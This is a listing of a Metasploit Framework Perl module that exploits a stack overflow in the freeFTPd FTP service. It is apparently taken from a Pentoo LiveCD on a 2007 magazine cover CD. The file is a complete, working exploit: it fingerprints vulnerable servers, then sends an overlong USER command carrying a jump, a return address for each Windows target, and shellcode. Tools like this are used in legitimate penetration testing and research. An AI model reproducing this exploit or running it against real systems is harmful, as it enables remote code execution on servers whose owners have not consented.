home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / usr / lib / metasploit / exploits / freeftpd_user.pm < prev    next >
Text File  |  2006-06-30  |  3KB  |  137 lines

  1.  
  2. ##
  3. # This file is part of the Metasploit Framework and may be redistributed
  4. # according to the licenses defined in the Authors field below. In the
  5. # case of an unknown or missing license, this file defaults to the same
  6. # license as the core Framework (dual GPLv2 and Artistic). The latest
  7. # version of the Framework can always be obtained from metasploit.com.
  8. ##
  9.  
  10. package Msf::Exploit::freeftpd_user;
  11. use base "Msf::Exploit";
  12. use strict;
  13. use Pex::Text;
  14.  
  15. my $advanced = { };
  16.  
  17. my $info =
  18.   {
  19.  
  20.     'Name'  => 'freeFTPd USER Overflow',
  21.     'Version'  => '$Revision: 1.2 $',
  22.     'Authors' => [ 'y0 [at] w00t-shell.net', ],
  23.     'Arch'  => [ 'x86' ],
  24.     'OS'    => [ 'win32', 'winnt', 'win2000', 'winxp', 'win2003' ],
  25.     'Priv'  => 0,
  26.     'UserOpts'  =>
  27.       {
  28.         'RHOST' => [1, 'ADDR', 'The target address'],
  29.         'RPORT' => [1, 'PORT', 'The target port', 21],
  30.         'SSL'   => [0, 'BOOL', 'Use SSL'],
  31.       },
  32.     'AutoOpts' => { 'EXITFUNC' => 'process' },
  33.     'Payload' =>
  34.       {
  35.         'Space'     => 800,
  36.         'BadChars'  => "\x00\x20\x0a\x0d",
  37.         'Prepend'   => "\x81\xc4\xff\xef\xff\xff\x44",
  38.         'Keys'      => ['+ws2ord'],
  39.       },
  40.  
  41.     'Description'  => Pex::Text::Freeform(qq{
  42.     This module exploits a stack overflow in the freeFTPd
  43.     multi-protocol file transfer service. This flaw can only
  44.     be exploited when logging has been enabled (non-default).
  45.  
  46. }),
  47.  
  48.     'Refs'  =>
  49.       [
  50.         ['OSVDB', '20909'],
  51.         ['URL', 'http://lists.grok.org.uk/pipermail/full-disclosure/2005-November/038808.html'],
  52.       ],
  53.  
  54.     'Targets' =>
  55.       [
  56.         ['Windows 2000 English ALL',       0x75022ac4],
  57.         ['Windows XP Pro SP0/SP1 English', 0x71aa32ad],
  58.         ['Windows NT SP5/SP6a English',    0x776a1799],
  59.         ['Windows 2003 Server English',    0x7ffc0638],
  60.       ],
  61.     'Keys' => ['ftp'],
  62.   };
  63.  
  64. sub new {
  65.     my $class = shift;
  66.     my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
  67.     return($self);
  68. }
  69.  
  70. sub Check {
  71.     my ($self) = @_;
  72.     my $target_host = $self->GetVar('RHOST');
  73.     my $target_port = $self->GetVar('RPORT');
  74.  
  75.     my $s = Msf::Socket::Tcp->new
  76.       (
  77.         'PeerAddr'  => $target_host,
  78.         'PeerPort'  => $target_port,
  79.         'LocalPort' => $self->GetVar('CPORT'),
  80.         'SSL'       => $self->GetVar('SSL'),
  81.       );
  82.  
  83.     if ($s->IsError) {
  84.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  85.         return $self->CheckCode('Connect');
  86.     }
  87.  
  88.     $s->Send("QUIT\r\n");
  89.     my $res = $s->Recv(-1, 20);
  90.     $s->Close();
  91.  
  92.     if ($res !~ /freeFTPd 1\.0/) {
  93.         $self->PrintLine("[*] This server does not appear to be vulnerable.");
  94.         return $self->CheckCode('Safe');
  95.     }
  96.  
  97.     $self->PrintLine("[*] Vulnerable installation detected :-)");
  98.     return $self->CheckCode('Detected');
  99. }
  100.  
  101. sub Exploit
  102. {
  103.     my $self = shift;
  104.     my $target_host = $self->GetVar('RHOST');
  105.     my $target_port = $self->GetVar('RPORT');
  106.     my $target_idx  = $self->GetVar('TARGET');
  107.     my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
  108.     my $target = $self->Targets->[$target_idx];
  109.  
  110.     my $splat = Pex::Text::EnglishText(1008);
  111.  
  112.     my $sploit =
  113.       $splat. "\xeb\x06". pack('V', $target->[1]).
  114.       $shellcode. "\r\n";
  115.  
  116.     $self->PrintLine(sprintf("[*] Trying to exploit target %s 0x%.8x", $target->[0], $target->[1]));
  117.  
  118.     my $s = Msf::Socket::Tcp->new
  119.       (
  120.         'PeerAddr'  => $target_host,
  121.         'PeerPort'  => $target_port,
  122.         'LocalPort' => $self->GetVar('CPORT'),
  123.         'SSL'       => $self->GetVar('SSL'),
  124.       );
  125.     if ($s->IsError) {
  126.         $self->PrintLine('[*] Error creating socket: ' . $s->GetError);
  127.         return;
  128.     }
  129.  
  130.     $s->Send("USER ". $sploit);
  131.     $self->Handler($s);
  132.     $s->Close();
  133.     return;
  134. }
  135.  
  136. 1;
  137.